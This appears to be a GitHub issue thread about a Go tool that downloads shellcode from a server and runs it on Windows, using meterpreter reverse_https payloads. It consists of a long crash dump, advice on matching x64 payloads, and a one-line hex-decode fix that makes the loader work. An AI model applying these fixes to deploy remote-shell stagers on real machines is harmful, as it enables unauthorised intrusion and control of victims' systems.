get crash when running on windows 10

[ajeecai]

With proper shellcode downloading server set in the code, compiling this repository with env GOOS=windows GOARCH=amd64 go build . When run the out executable in windows 10, get crash. Did you see this before?

Thanks

Exception 0xc0000005 0x0 0x1d 0xc0000b2000 PC=0xc0000b2000

runtime: g 1: unknown pc 0xc0000b2000 stack: frame={sp:0xc000149df0, fp:0x0} stack=[0xc000142000,0xc00014a000) 0x000000c000149cf0: 0x000000000069dfe0 0x000000c00005e000 0x000000c000149d00: 0x0000000000000000 0x0000000000000000 0x000000c000149d10: 0x00000000005109a0 <internal/poll.(FD).Write.func3+0x0000000000000000> 0x000000c00014e440 0x000000c000149d20: 0x0000000000510a00 <internal/poll.(FD).Write.func2+0x0000000000000000> 0x000000c00014e280 0x000000c000149d30: 0x000000c000149d10 0x00000000004cdcde <sync.(Pool).pin+0x000000000000001e> 0x000000c000149d40: 0x000000c000149d98 0x000000c000149d70 0x000000c000149d50: 0x00000000004cd9c5 <sync.(Pool).Put+0x0000000000000085> 0x00000000008c36e0 0x000000c000149d60: 0x0000000000000011 0x0000000000000060 0x000000c000149d70: 0x000000c000149d98 0x00000000005184ca <fmt.(pp).free+0x00000000000000ca> 0x000000c000149d80: 0x00000000008c36e0 0x00000000006dbfa0 0x000000c000149d90: 0x000000c0000200d0 0x000000c000149de8 0x000000c000149da0: 0x0000000000518c2e <fmt.Fprintln+0x000000000000008e> 0x000000c00014c008 0x000000c000149db0: 0x000000c00005e000 0x0000000000000011 0x000000c000149dc0: 0x000000c000012280 0x0000000000000011 0x000000c000149dd0: 0x000000c0000200d0 0x0000000000000000 0x000000c000149de0: 0x0000000000000000 0x000000c000149ea0 0x000000c000149df0: <0x00000000006834c2 <main.Run+0x0000000000000222> 0x000000000075eaa0 0x000000c000149e00: 0x000000c00014c008 0x000000c000149e30 0x000000c000149e10: 0x0000000000000001 0x0000000000000001 0x000000c000149e20: 0x0000000400000002 0x00000000007146d0 0x000000c000149e30: 0x000000000069dfe0 0x000000000075daa0 0x000000c000149e40: 0x000000000069dfe0 0x000000000075da90 0x000000c000149e50: 0x000000000069e120 0x00000000008a3b20 0x000000c000149e60: 0x000000000069dfe0 0x000000000075da80 0x000000c000149e70: 0x000000000069e1e0 0x000000c00000e0a0 0x000000c000149e80: 0x000000000069dfe0 0x000000000075da70 0x000000c000149e90: 0x000000000069e120 0x00000000008a3b10 0x000000c000149ea0: 0x000000c000149f28 0x00000000006828d9 <main.downloadAndRun+0x0000000000000139> 0x000000c000149eb0: 0x000000c0000b2000 0x00000000000005af 0x000000c000149ec0: 0x0000000000000800 0x0000000000000001 0x000000c000149ed0: 0x0000000000000001 0x000000000000000d 0x000000c000149ee0: 0x00000000000005af 0x0000000000000800 runtime: g 1: unknown pc 0xc0000b2000 stack: frame={sp:0xc000149df0, fp:0x0} stack=[0xc000142000,0xc00014a000) 0x000000c000149cf0: 0x000000000069dfe0 0x000000c00005e000 0x000000c000149d00: 0x0000000000000000 0x0000000000000000 0x000000c000149d10: 0x00000000005109a0 <internal/poll.(FD).Write.func3+0x0000000000000000> 0x000000c00014e440 0x000000c000149d20: 0x0000000000510a00 <internal/poll.(FD).Write.func2+0x0000000000000000> 0x000000c00014e280 0x000000c000149d30: 0x000000c000149d10 0x00000000004cdcde <sync.(Pool).pin+0x000000000000001e> 0x000000c000149d40: 0x000000c000149d98 0x000000c000149d70 0x000000c000149d50: 0x00000000004cd9c5 <sync.(Pool).Put+0x0000000000000085> 0x00000000008c36e0 0x000000c000149d60: 0x0000000000000011 0x0000000000000060 0x000000c000149d70: 0x000000c000149d98 0x00000000005184ca <fmt.(pp).free+0x00000000000000ca> 0x000000c000149d80: 0x00000000008c36e0 0x00000000006dbfa0 0x000000c000149d90: 0x000000c0000200d0 0x000000c000149de8 0x000000c000149da0: 0x0000000000518c2e <fmt.Fprintln+0x000000000000008e> 0x000000c00014c008 0x000000c000149db0: 0x000000c00005e000 0x0000000000000011 0x000000c000149dc0: 0x000000c000012280 0x0000000000000011 0x000000c000149dd0: 0x000000c0000200d0 0x0000000000000000 0x000000c000149de0: 0x0000000000000000 0x000000c000149ea0 0x000000c000149df0: <0x00000000006834c2 <main.Run+0x0000000000000222> 0x000000000075eaa0 0x000000c000149e00: 0x000000c00014c008 0x000000c000149e30 0x000000c000149e10: 0x0000000000000001 0x0000000000000001 0x000000c000149e20: 0x0000000400000002 0x00000000007146d0 0x000000c000149e30: 0x000000000069dfe0 0x000000000075daa0 0x000000c000149e40: 0x000000000069dfe0 0x000000000075da90 0x000000c000149e50: 0x000000000069e120 0x00000000008a3b20 0x000000c000149e60: 0x000000000069dfe0 0x000000000075da80 0x000000c000149e70: 0x000000000069e1e0 0x000000c00000e0a0 0x000000c000149e80: 0x000000000069dfe0 0x000000000075da70 0x000000c000149e90: 0x000000000069e120 0x00000000008a3b10 0x000000c000149ea0: 0x000000c000149f28 0x00000000006828d9 <main.downloadAndRun+0x0000000000000139> 0x000000c000149eb0: 0x000000c0000b2000 0x00000000000005af 0x000000c000149ec0: 0x0000000000000800 0x0000000000000001 0x000000c000149ed0: 0x0000000000000001 0x000000000000000d 0x000000c000149ee0: 0x00000000000005af 0x0000000000000800

goroutine 2 [force gc (idle)]: runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?) /usr/lib/go-1.19/src/runtime/proc.go:363 +0xd6 fp=0xc000045fb0 sp=0xc000045f90 pc=0x49a736 runtime.goparkunlock(...) /usr/lib/go-1.19/src/runtime/proc.go:369 runtime.forcegchelper() /usr/lib/go-1.19/src/runtime/proc.go:302 +0xb1 fp=0xc000045fe0 sp=0xc000045fb0 pc=0x49a5d1 runtime.goexit() /usr/lib/go-1.19/src/runtime/asm_amd64.s:1594 +0x1 fp=0xc000045fe8 sp=0xc000045fe0 pc=0x4c4861 created by runtime.init.6 /usr/lib/go-1.19/src/runtime/proc.go:290 +0x25

goroutine 3 [GC sweep wait]: runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?) /usr/lib/go-1.19/src/runtime/proc.go:363 +0xd6 fp=0xc000047f90 sp=0xc000047f70 pc=0x49a736 runtime.goparkunlock(...) /usr/lib/go-1.19/src/runtime/proc.go:369 runtime.bgsweep(0x0?) /usr/lib/go-1.19/src/runtime/mgcsweep.go:278 +0x8e fp=0xc000047fc8 sp=0xc000047f90 pc=0x484d2e runtime.gcenable.func1() /usr/lib/go-1.19/src/runtime/mgc.go:178 +0x26 fp=0xc000047fe0 sp=0xc000047fc8 pc=0x479ac6 runtime.goexit() /usr/lib/go-1.19/src/runtime/asm_amd64.s:1594 +0x1 fp=0xc000047fe8 sp=0xc000047fe0 pc=0x4c4861 created by runtime.gcenable /usr/lib/go-1.19/src/runtime/mgc.go:178 +0x6b

goroutine 4 [GC scavenge wait]: runtime.gopark(0xc00001c070?, 0x75d590?, 0x1?, 0x0?, 0x0?) /usr/lib/go-1.19/src/runtime/proc.go:363 +0xd6 fp=0xc000057f70 sp=0xc000057f50 pc=0x49a736 runtime.goparkunlock(...) /usr/lib/go-1.19/src/runtime/proc.go:369 runtime.(*scavengerState).park(0x8ce140) /usr/lib/go-1.19/src/runtime/mgcscavenge.go:389 +0x53 fp=0xc000057fa0 sp=0xc000057f70 pc=0x482db3 runtime.bgscavenge(0x0?) /usr/lib/go-1.19/src/runtime/mgcscavenge.go:617 +0x45 fp=0xc000057fc8 sp=0xc000057fa0 pc=0x4833a5 runtime.gcenable.func2() /usr/lib/go-1.19/src/runtime/mgc.go:179 +0x26 fp=0xc000057fe0 sp=0xc000057fc8 pc=0x479a66 runtime.goexit() /usr/lib/go-1.19/src/runtime/asm_amd64.s:1594 +0x1 fp=0xc000057fe8 sp=0xc000057fe0 pc=0x4c4861 created by runtime.gcenable /usr/lib/go-1.19/src/runtime/mgc.go:179 +0xaa

goroutine 18 [finalizer wait]: runtime.gopark(0x0?, 0x893f50?, 0xeb?, 0x6e?, 0xc000049f70?) /usr/lib/go-1.19/src/runtime/proc.go:363 +0xd6 fp=0xc000049e28 sp=0xc000049e08 pc=0x49a736 runtime.goparkunlock(...) /usr/lib/go-1.19/src/runtime/proc.go:369 runtime.runfinq() /usr/lib/go-1.19/src/runtime/mfinal.go:180 +0x10f fp=0xc000049fe0 sp=0xc000049e28 pc=0x478bcf runtime.goexit() /usr/lib/go-1.19/src/runtime/asm_amd64.s:1594 +0x1 fp=0xc000049fe8 sp=0xc000049fe0 pc=0x4c4861 created by runtime.createfing /usr/lib/go-1.19/src/runtime/mfinal.go:157 +0x45 rax 0x11 rbx 0x0 rcx 0x0 rdi 0xc rsi 0xc0000b2000 rbp 0xc000149ea0 rsp 0xc000149df0 r8 0x4 r9 0x0 r10 0x1 r11 0xc00005e000 r12 0x0 r13 0x0 r14 0xc000042000 r15 0xffffffffffffffff rip 0xc0000b2000 rflags 0x10216 cs 0x33 fs 0x53 gs 0x2b

[bogey3]

It's still working for me, it looks like you might be using a 32 bit payload with a 64 bit stager. Try either setting GOARCH=386 instead of amd64 or make sure the payload your using is windows/x64/meterpreter/reverse_https and not windows/meterpreter/reverse_https.

[ajeecai]

I have generated with x64 meterpreter ... Now find out, in downloadAndRun

data := GetExecutable(host, port, uuid) tmp, _ := hex.DecodeString(string(data)) <- add this line Run(tmp)

Because the shellcode file I put on my testing server is in string, not a binary, so need to convert it back to binary. Then it works, please feel free to close this issue.

Thanks